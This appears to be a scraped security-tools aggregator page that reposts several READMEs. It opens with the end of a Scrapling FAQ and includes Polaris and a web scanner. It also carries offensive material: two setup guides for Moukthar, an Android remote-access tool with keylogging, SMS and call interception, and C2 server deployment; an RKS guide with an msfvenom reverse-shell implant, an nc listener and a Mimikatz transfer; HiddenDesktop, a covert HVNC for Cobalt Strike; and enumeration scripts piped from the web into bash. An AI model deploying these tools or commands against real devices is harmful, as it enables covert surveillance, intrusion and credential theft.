Not a big problem as it depends on your usage. The word default will be used in place of the URL field while saving the element's unique properties. So this will only be an issue if you used the same identifier later for a different website that you didn't pass the URL parameter while initializing it as well. The save process will overwrite the previous data and auto-matching uses the latest saved properties only.

If all things about an element can change or get removed, what are the unique properties to be saved?

For each element, Scrapling will extract: - Element tag name, text, attributes (names and values), siblings (tag names only), and path (tag names only). - Element's parent tag name, attributes (names and values), and text.

I have enabled the auto_save/auto_match parameter while selecting and it got completely ignored with a warning message

That's because passing the auto_save/auto_match argument without setting auto_match to True while initializing the Adaptor object will only result in ignoring the auto_save/auto_match argument value. This behavior is purely for performance reasons so the database gets created only when you are planning to use the auto-matching features.

I have done everything as the docs but the auto-matching didn't return anything, what's wrong?

It could be one of these reasons: 1. No data were saved/stored for this element before. 2. The selector passed is not the one used while storing element data. The solution is simple - Pass the old selector again as an identifier to the method called. - Retrieve the element with the retrieve method using the old selector as identifier then save it again with the save method and the new selector as identifier. - Start using the identifier argument more often if you are planning to use every new selector from now on. 3. The website had some extreme structural changes like a new full design. If this happens a lot with this website, the solution would be to make your code as selector-free as possible using Scrapling features.

Can Scrapling replace code built on top of BeautifulSoup4?

Pretty much yeah, almost all features you get from BeautifulSoup can be found or achieved in Scrapling one way or another. In fact, if you see there's a feature in bs4 that is missing in Scrapling, please make a feature request from the issues tab to let me know.

Can Scrapling replace code built on top of AutoScraper?

Of course, you can find elements by text/regex, find similar elements in a more reliable way than AutoScraper, and finally save/retrieve elements manually to use later as the model feature in AutoScraper. I have pulled all top articles about AutoScraper from Google and tested Scrapling against examples in them. In all examples, Scrapling got the same results as AutoScraper in much less time.

Is Scrapling thread-safe?

Yes, Scrapling instances are thread-safe. Each Adaptor instance maintains its state.

More Sponsors!

Contributing

Everybody is invited and welcome to contribute to Scrapling. There is a lot to do!

Please read the contributing file before doing anything.

Disclaimer for Scrapling Project

[!CAUTION] This library is provided for educational and research purposes only. By using this library, you agree to comply with local and international laws regarding data scraping and privacy. The authors and contributors are not responsible for any misuse of this software. This library should not be used to violate the rights of others, for unethical purposes, or to use data in an unauthorized or illegal manner. Do not use it on any website unless you have permission from the website owner or within their allowed rules like the robots.txt file, for example.

License

This work is licensed under BSD-3

Acknowledgments

This project includes code adapted from: - Parsel (BSD License) - Used for translator submodule

Thanks and References

Known Issues

  • In the auto-matching save process, the unique properties of the first element from the selection results are the only ones that get saved. So if the selector you are using selects different elements on the page that are in different locations, auto-matching will probably return to you the first element only when you relocate it later. This doesn't include combined CSS selectors (Using commas to combine more than one selector for example) as these selectors get separated and each selector gets executed alone.

Designed & crafted with ❀️ by Karim Shoair.



Moukthar - Android Remote Administration Tool

By: Unknown


Remote adminitration tool for android

Features

  • Permissions bypass (android 12 below) https://youtube.com/shorts/-w8H0lkFxb0
  • Keylogger https://youtube.com/shorts/Ll9dNrkjFOA
  • Notifications listener
  • SMS listener
  • Phone call recording
  • Image capturing and screenshots
  • Video recording
  • Persistence
  • Read & write contacts
  • List installed applications
  • Download & upload files
  • Get device location

Installation

  • Clone repository console git clone https://github.com/Tomiwa-Ot/moukthar.git
  • Install php, composer, mysql, php-mysql driver, apache2 and a2enmod
  • Move server files to /var/www/html/ and install dependencies console mv moukthar/Server/* /var/www/html/ cd /var/www/html/c2-server composer install cd /var/www/html/web-socket/ composer install cd /var/www chown -R www-data:www-data . chmod -R 777 . The default credentials are username: android and password: android
  • Create new sql user mysql CREATE USER 'android'@'localhost' IDENTIFIED BY 'your-password'; GRANT ALL PRIVILEGES ON *.* TO 'android'@'localhost'; FLUSH PRIVILEGES;
  • Set database credentials in c2-server/.env and web-socket/.env
  • Execute database.sql
  • Start web socket server or deploy as service in linux console php Server/web-socket/App.php # OR sudo mv Server/websocket.service /etc/systemd/system/ sudo systemctl daemon-reload sudo systemctl enable websocket.service sudo systemctl start websocket.service
  • Modify /etc/apache2/sites-available/000-default.conf ```console ServerAdmin webmaster@localhost DocumentRoot /var/www/html/c2-server DirectoryIndex app.php Options -Indexes
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

- Modify/etc/apache2/apache2.confxml Comment this section # # Options FollowSymLinks # AllowOverride None # Require all denied #

Add this Options -Indexes DirectoryIndex app.php AllowOverride All Require all granted - Increase php file upload max size/etc/php/./apache2/php.iniini ; Increase size to permit large file uploads from client upload_max_filesize = 128M ; Set post_max_size to upload_max_filesize + 1 post_max_size = 129M - Set web socket server address in <script> tag inc2-server/src/View/home.phpandc2-server/src/View/features/files.phpconsole const ws = new WebSocket('ws://IP_ADDRESS:8080'); - Restart apache using the command belowconsole sudo a2enmod rewrite && sudo service apache2 restart - Set C2 server and web socket server address in clientfunctionality/Utils.javajava public static final String C2_SERVER = "http://localhost";

public static final String WEB_SOCKET_SERVER = "ws://localhost:8080"; ``` - Compile APK using Android Studio and deploy to target

Screenshots

TODO

  • Auto scroll logs on dashboard
  • Screenshot not working
  • Image/Video capturing doesn't work when application isn't in focus
  • Downloading files in app using DownloadManager not working
  • Listing constituents of a directory doesn't list all files/folders


Linux-Smart-Enumeration - Linux Enumeration Tool For Pentesting And CTFs With Verbosity Levels

By: Zion3R


First, a couple of useful oneliners ;)

wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

Note that since version 2.10 you can serve the script to other hosts with the -S flag!


linux-smart-enumeration

Linux enumeration tools for pentesting and CTFs

This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests.

Unlike LinEnum, lse tries to gradualy expose the information depending on its importance from a privesc point of view.

What is it?

This shell script will show relevant information about the security of the local Linux system, helping to escalate privileges.

From version 2.0 it is mostly POSIX compliant and tested with shellcheck and posh.

It can also monitor processes to discover recurrent program executions. It monitors while it is executing all the other tests so you save some time. By default it monitors during 1 minute but you can choose the watch time with the -p parameter.

It has 3 levels of verbosity so you can control how much information you see.

In the default level you should see the highly important security flaws in the system. The level 1 (./lse.sh -l1) shows interesting information that should help you to privesc. The level 2 (./lse.sh -l2) will just dump all the information it gathers about the system.

By default it will ask you some questions: mainly the current user password (if you know it ;) so it can do some additional tests.

How to use it?

The idea is to get the information gradually.

First you should execute it just like ./lse.sh. If you see some green yes!, you probably have already some good stuff to work with.

If not, you should try the level 1 verbosity with ./lse.sh -l1 and you will see some more information that can be interesting.

If that does not help, level 2 will just dump everything you can gather about the service using ./lse.sh -l2. In this case you might find useful to use ./lse.sh -l2 | less -r.

You can also select what tests to execute by passing the -s parameter. With it you can select specific tests or sections to be executed. For example ./lse.sh -l2 -s usr010,net,pro will execute the test usr010 and all the tests in the sections net and pro.

Use: ./lse.sh [options]

OPTIONS
-c Disable color
-i Non interactive mode
-h This help
-l LEVEL Output verbosity level
0: Show highly important results. (default)
1: Show interesting results.
2: Show all gathered information.
-s SELECTION Comma separated list of sections or tests to run. Available
sections:
usr: User related tests.
sud: Sudo related tests.
fst: File system related tests.
sys: System related tests.
sec: Security measures related tests.
ret: Recurren tasks (cron, timers) related tests.
net: Network related tests.
srv: Services related tests.
pro: Processes related tests.
sof: Software related tests.
ctn: Container (docker, lxc) related tests.
cve: CVE related tests.
Specific tests can be used with their IDs (i.e.: usr020,sud)
-e PATHS Comma separated list of paths to exclude. This allows you
to do faster scans at the cost of completeness
-p SECONDS Time that the process monitor will spend watching for
processes. A value of 0 will disable any watch (default: 60)
-S Serve the lse.sh script in this host so it can be retrieved
from a remote host.

Is it pretty?

Usage demo

Also available in webm video


Level 0 (default) output sample


Level 1 verbosity output sample


Level 2 verbosity output sample


Examples

Direct execution oneliners

bash <(wget -q -O - "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l2 -i
bash <(curl -s "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l1 -i


Moukthar - Android Remote Administration Tool

By: Zion3R


Remote adminitration tool for android


Features
  • Notifications listener
  • SMS listener
  • Phone call recording
  • Image capturing and screenshots
  • Persistence
  • Read & write contacts
  • List installed applications
  • Download & upload files
  • Get device location

Installation
  • Clone repository console git clone https://github.com/Tomiwa-Ot/moukthar.git
  • Move server files to /var/www/html/ and install dependencies console mv moukthar/Server/* /var/www/html/ cd /var/www/html/c2-server composer install cd /var/www/html/web\ socket/ composer install The default credentials are username: android and password: the rastafarian in you
  • Set database credentials in c2-server/.env and web socket/.env
  • Execute database.sql
  • Start web socket server or deploy as service in linux console php Server/web\ socket/App.php # OR sudo mv Server/websocket.service /etc/systemd/system/ sudo systemctl daemon-reload sudo systemctl enable websocket.service sudo systemctl start websocket.service
  • Modify /etc/apache2/apache2.conf xml <Directory /var/www/html/c2-server> Options -Indexes DirectoryIndex app.php AllowOverride All Require all granted </Directory>
  • Set C2 server and web socket server address in client functionality/Utils.java ```java public static final String C2_SERVER = "http://localhost";

public static final String WEB_SOCKET_SERVER = "ws://localhost:8080"; ``` - Compile APK using Android Studio and deploy to target


TODO
  • Auto scroll logs on dashboard


RKS - A Script To Automate Keystrokes Through A Graphical Desktop Program

By: Zion3R


A script to automate keystrokes through an active remote desktop session that assists offensive operators in combination with living off the land techniques.


About RKS (RemoteKeyStrokes)

All credits goes to nopernik for making it possible so I took it upon myself to improve it. I wanted something that helps during the post exploitation phase when executing commands through a remote desktop.


Help Menu
$ ./rks.sh -h
Usage: ./rks.sh (RemoteKeyStrokes)
Options:
-c, --command <command | cmdfile> Specify a command or a file containing to execute
-i, --input <input_file> Specify the local input file to transfer
-o, --output <output_file> Specify the remote output file to transfer
-m, --method <method> Specify the file transfer or execution method
(For file transfer "base64" is set by default if
not specified. For execution method "none" is set
by default if not specified)

-p, --platform <operating_system> Specify the operating system (windows is set by
default if not specified)

-w, --windowname <name> Specify t he window name for graphical remote
program (freerdp is set by default if not
specified)

-h, --help Display this help message

Usage

Internal Reconnaissance
  • When running in command prompt
$ cat recon_cmds.txt
whoami /all
net user
net localgroup Administrators
net user /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net group "Domain Computers" /domain

$ ./rks.h -c recon_cmds.txt

Execute Implant
  • Execute an implant while reading the contents of the payload in powershell.
$ msfvenom -p windowx/x64/shell_reverse_tcp lhost=<IP> lport=4444 -f psh -o implant.ps1

$ ./rks.sh -c implant.ps1

$ nc -lvnp 4444

File Transfer
  • Transfer a file remotely when pivoting in a isolated network. If you want to specify the remote path on windows be sure to include quotes.
$ ./rks.sh -i /usr/share/powersploit/Privesc/PowerUp.ps1 -o script.ps1

$ ./rks.sh -i /usr/share/powersploit/Exfiltration/Invoke-Mimikatz.ps1 -o "C:\Windows\Temp\update.ps1" -m base64

Specify Grapical Remote Software
  • If you're targeting VNC network protocols you can specify the window name with tightvnc.

$ ./rks.sh -i implant.ps1 -w tightvnc

  • If you're targeting legacy operating systems with older RDP authentication specify the window name with rdesktop.

$ ./rks.sh -i implant.bat -w rdesktop


TODO and Help Wanted
  • Add text colors for better user experience

  • Implement Base64 file transfer

  • Implement Bin2Hex file transfer

  • Implement a persistence function for both windows and linux.

  • Implement antiforensics function for both windows and linux.

  • Implement to read shellcode input and run C# implant and powershell runspace

  • Implement privesc function for both windows and linux


References

Credits


HiddenDesktop - HVNC For Cobalt Strike

By: Zion3R


Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved, but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++.

There are four components of Hidden Desktop:

  1. BOF initializer: Small program responsible for injecting the HVNC code into the Beacon process.

  2. HVNC shellcode: PIC implementation of TinyNuke HVNC.

  3. Server and operator UI: Server that listens for connections from the HVNC shellcode and a UI that allows the operator to interact with the remote desktop. Currently only supports Windows.

  4. Application launcher BOFs: Set of Beacon Object Files that execute applications in the new desktop.


Usage

Download the latest release or compile yourself using make. Start the HVNC server on a Windows machine accessible from the teamserver. You can then execute the client with:

HiddenDesktop <server> <port>

You should see a new blank window on the server machine. The BOF does not execute any applications by default. You can use the application launcher BOFs to execute common programs on the new desktop:

hd-launch-edge
hd-launch-explorer
hd-launch-run
hd-launch-cmd
hd-launch-chrome

You can also launch programs through File Explorer using the mouse and keyboard. Other applications can be executed using the following command:

hd-launch <command> [args]

Demo

Hidden.Desktop.mp4

Implementation Details

  1. The Aggressor script generates random pipe and desktop names. These are passed to the BOF initializer as arguments. The desktop name is stored in CS preferences at execution and is used by the application launcher BOFs. HVNC traffic is forwarded back to the team server using rportfwd. Status updates are sent back to Beacon through a named pipe.
  2. The BOF initializer starts by resolving the required modules and functions. Arguments from the Aggressor script are resolved. A pointer to a structure containing the arguments and function addresses is passed to the InputHandler function in the HVNC shellcode. It uses BeaconInjectProcess to execute the shellcode, meaning the behavior can be customized in a Malleable C2 profile or with process injection BOFs. You could modify Hidden Desktop to target remote processes, but this is not currently supported. This is done so the BOF can exit and the HVNC shellcode can continue running.
  3. InputHandler creates a new named pipe for Beacon to connect to. Once a connection has been established, the specified desktop is opened (OpenDesktopA) or created (CreateDesktopA). A new socket is established through a reverse port forward (rportfwd) to the HVNC server. The input handler creates a new thread for the DesktopHandler function described below. This thread will receive mouse and keyboard input from the HVNC server and forward it to the desktop.
  4. DesktopHandler establishes an additional socket connection to the HVNC server through the reverse port forward. This thread will monitor windows for changes and forward them to the HVNC server.

Compatibility

The HiddenDesktop BOF was tested using example.profile on the following Windows versions/architectures:

  • Windows Server 2022 x64
  • Windows Server 2016 x64
  • Windows Server 2012 R2 x64
  • Windows Server 2008 x86
  • Windows 7 SP1 x64

Known Issues

  • The start menu is not functional.

Credits



Polaris - Validation Of Best Practices In Your Kubernetes Clusters

By: Zion3R

Polaris is an open source policy engine for Kubernetes

Polaris is an open source policy engine for Kubernetes that validates and remediates resource configuration. It includes 30+ built in configuration policies, as well as the ability to build custom policies with JSON Schema. When run on the command line or as a mutating webhook, Polaris can automatically remediate issues based on policy criteria.

Polaris can be run in three different modes:

  • As a dashboard - Validate Kubernetes resources against policy-as-code.
  • As an admission controller - Automatically reject or modify workloads that don't adhere to your organization's policies.
  • As a command-line tool - Incorporate policy-as-code into the CI/CD process to test local YAML files.

Validation of best practices in your Kubernetes clusters (6)

Documentation

Check out the documentation at docs.fairwinds.com

Join the Fairwinds Open Source Community

The goal of the Fairwinds Community is to exchange ideas, influence the open source roadmap, and network with fellow Kubernetes users. Chat with us on Slack or join the user group to get involved!

Other Projects from Fairwinds

Enjoying Polaris? Check out some of our other projects:

  • Goldilocks - Right-size your Kubernetes Deployments by compare your memory and CPU settings against actual usage
  • Pluto - Detect Kubernetes resources that have been deprecated or removed in future versions
  • Nova - Check to see if any of your Helm charts have updates available
  • rbac-manager - Simplify the management of RBAC in your Kubernetes clusters

Or check out the full list

Fairwinds Insights

If you're interested in running Polaris in multiple clusters, tracking the results over time, integrating with Slack, Datadog, and Jira, or unlocking other functionality, check out Fairwinds Insights, a platform for auditing and enforcing policy in Kubernetes clusters.



Scanner-and-Patcher - A Web Vulnerability Scanner And Patcher

By: Zion3R


This tools is very helpful for finding vulnerabilities present in the Web Applications.

  • A web application scanner explores a web application by crawling through its web pages and examines it for security vulnerabilities, which involves generation of malicious inputs and evaluation of application's responses.
    • These scanners are automated tools that scan web applications to look for security vulnerabilities. They test web applications for common security problems such as cross-site scripting (XSS), SQL injection, and cross-site request forgery (CSRF).
    • This scanner uses different tools like nmap, dnswalk, dnsrecon, dnsenum, dnsmap etc in order to scan ports, sites, hosts and network to find vulnerabilites like OpenSSL CCS Injection, Slowloris, Denial of Service, etc.

Tools Used

Serial No. Tool Name Serial No. Tool Name
1 whatweb 2 nmap
3 golismero 4 host
5 wget 6 uniscan
7 wafw00f 8 dirb
9 davtest 10 theharvester
11 xsser 12 fierce
13 dnswalk 14 dnsrecon
15 dnsenum 16 dnsmap
17 dmitry 18 nikto
19 whois 20 lbd
21 wapiti 22 devtest
23 sslyze

Working

Phase 1

  • User has to write:- "python3 web_scan.py (https or http) ://example.com"
  • At first program will note initial time of running, then it will make url with "www.example.com".
  • After this step system will check the internet connection using ping.
  • Functionalities:-
    • To navigate to helper menu write this command:- --help for update --update
    • If user want to skip current scan/test:- CTRL+C
    • To quit the scanner use:- CTRL+Z
    • The program will tell scanning time taken by the tool for a specific test.

Phase 2

  • From here the main function of scanner will start:
  • The scanner will automatically select any tool to start scanning.
  • Scanners that will be used and filename rotation (default: enabled (1)
  • Command that is used to initiate the tool (with parameters and extra params) already given in code
  • After founding vulnerability in web application scanner will classify vulnerability in specific format:-
    • [Responses + Severity (c - critical | h - high | m - medium | l - low | i - informational) + Reference for Vulnerability Definition and Remediation]
    • Here c or critical defines most vulnerability wheres l or low is for least vulnerable system

Definitions:-

  • Critical:- Vulnerabilities that score in the critical range usually have most of the following characteristics: Exploitation of the vulnerability likely results in root-level compromise of servers or infrastructure devices.Exploitation is usually straightforward, in the sense that the attacker does not need any special authentication credentials or knowledge about individual victims, and does not need to persuade a target user, for example via social engineering, into performing any special functions.

  • High:- An attacker can fully compromise the confidentiality, integrity or availability, of a target system without specialized access, user interaction or circumstances that are beyond the attacker’s control. Very likely to allow lateral movement and escalation of attack to other systems on the internal network of the vulnerable application. The vulnerability is difficult to exploit. Exploitation could result in elevated privileges. Exploitation could result in a significant data loss or downtime.

  • Medium:- An attacker can partially compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker’s control may be required for an attack to succeed. Very likely to be used in conjunction with other vulnerabilities to escalate an attack.Vulnerabilities that require the attacker to manipulate individual victims via social engineering tactics. Denial of service vulnerabilities that are difficult to set up. Exploits that require an attacker to reside on the same local network as the victim. Vulnerabilities where exploitation provides only very limited access. Vulnerabilities that require user privileges for successful exploitation.

  • Low:- An attacker has limited scope to compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker’s control is required for an attack to succeed. Needs to be used in conjunction with other vulnerabilities to escalate an attack.

  • Info:- An attacker can obtain information about the web site. This is not necessarily a vulnerability, but any information which an attacker obtains might be used to more accurately craft an attack at a later date. Recommended to restrict as far as possible any information disclosure.

  • CVSS V3 SCORE RANGE SEVERITY IN ADVISORY
    0.1 - 3.9 Low
    4.0 - 6.9 Medium
    7.0 - 8.9 High
    9.0 - 10.0 Critical

Vulnerabilities

  • After this scanner will show results which inclues:
    • Response time
    • Total time for scanning
    • Class of vulnerability

Remediation

  • Now, Scanner will tell about harmful effects of that specific type vulnerabilility.
  • Scanner tell about sources to know more about the vulnerabilities. (websites).
  • After this step, scanner suggests some remdies to overcome the vulnerabilites.

Phase 3

  • Scanner will Generate a proper report including
    • Total number of vulnerabilities scanned
    • Total number of vulnerabilities skipped
    • Total number of vulnerabilities detected
    • Time taken for total scan
    • Details about each and every vulnerabilites.
  • Writing all scan files output into SA-Debug-ScanLog for debugging purposes under the same directory
  • For Debugging Purposes, You can view the complete output generated by all the tools named SA-Debug-ScanLog.

Use

Use Program as python3 web_scan.py (https or http) ://example.com
--help
--update
Serial No. Vulnerabilities to Scan Serial No. Vulnerabilities to Scan
1 IPv6 2 Wordpress
3 SiteMap/Robot.txt 4 Firewall
5 Slowloris Denial of Service 6 HEARTBLEED
7 POODLE 8 OpenSSL CCS Injection
9 FREAK 10 Firewall
11 LOGJAM 12 FTP Service
13 STUXNET 14 Telnet Service
15 LOG4j 16 Stress Tests
17 WebDAV 18 LFI, RFI or RCE.
19 XSS, SQLi, BSQL 20 XSS Header not present
21 Shellshock Bug 22 Leaks Internal IP
23 HTTP PUT DEL Methods 24 MS10-070
25 Outdated 26 CGI Directories
27 Interesting Files 28 Injectable Paths
29 Subdomains 30 MS-SQL DB Service
31 ORACLE DB Service 32 MySQL DB Service
33 RDP Server over UDP and TCP 34 SNMP Service
35 Elmah 36 SMB Ports over TCP and UDP
37 IIS WebDAV 38 X-XSS Protection

Installation

git clone https://github.com/Malwareman007/Scanner-and-Patcher.git
cd Scanner-and-Patcher/setup
python3 -m pip install --no-cache-dir -r requirements.txt

Screenshots of Scanner

Contributions

Template contributions , Feature Requests and Bug Reports are more than welcome.

Authors

GitHub: @Malwareman007
GitHub: @Riya73
GitHub:@nano-bot01

Contributing

Contributions, issues and feature requests are welcome!
Feel free to check issues page.



❌